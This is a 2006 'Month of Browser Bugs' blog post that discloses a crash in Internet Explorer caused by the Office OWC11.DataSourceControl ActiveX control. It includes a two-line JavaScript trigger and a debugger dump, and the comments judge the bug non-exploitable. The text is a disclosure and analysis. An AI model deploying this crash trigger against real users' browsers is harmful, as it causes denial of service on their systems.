Wednesday, July 19, 2006

MoBB #19: DataSourceControl getDataMemberName

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Office 2003 to be installed (older versions of this control have not been tested). Calling the getDataMemberName() method with a negative large integer value results in an integer overflow and a NULL dereference.

var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);

Demonstration

eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????

This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow

posted by hdm @ 12:15 AM   5 comments links to this post

5 Comments:

At 3:07 PM, Anonymous XXLS said...

Office 2002 affected too. You can use "OWC10.DataSourceControl.10" or "OWC9.DataSourceControl.9".

hdm, Is this exploitable ? seems non exploitable for me.

 
At 3:17 PM, Blogger hdm said...

Doesn't look exploitable.

 
At 10:59 PM, Anonymous Anonymous said...

Where the exploitable shiat? this is boring...

 
At 11:00 PM, Anonymous Anonymous said...

It's not all that negative.
The sign does not matter.

0x80000000 == -0x80000000

(assuming 32-bit of course)

 
At 11:01 PM, Anonymous Anonymous said...

It's not all that negative.
The sign does not matter.

0x80000000 == -0x80000000

(assuming 32-bit of course)

 

Post a Comment

Links to this post:

Create a Link

<< Home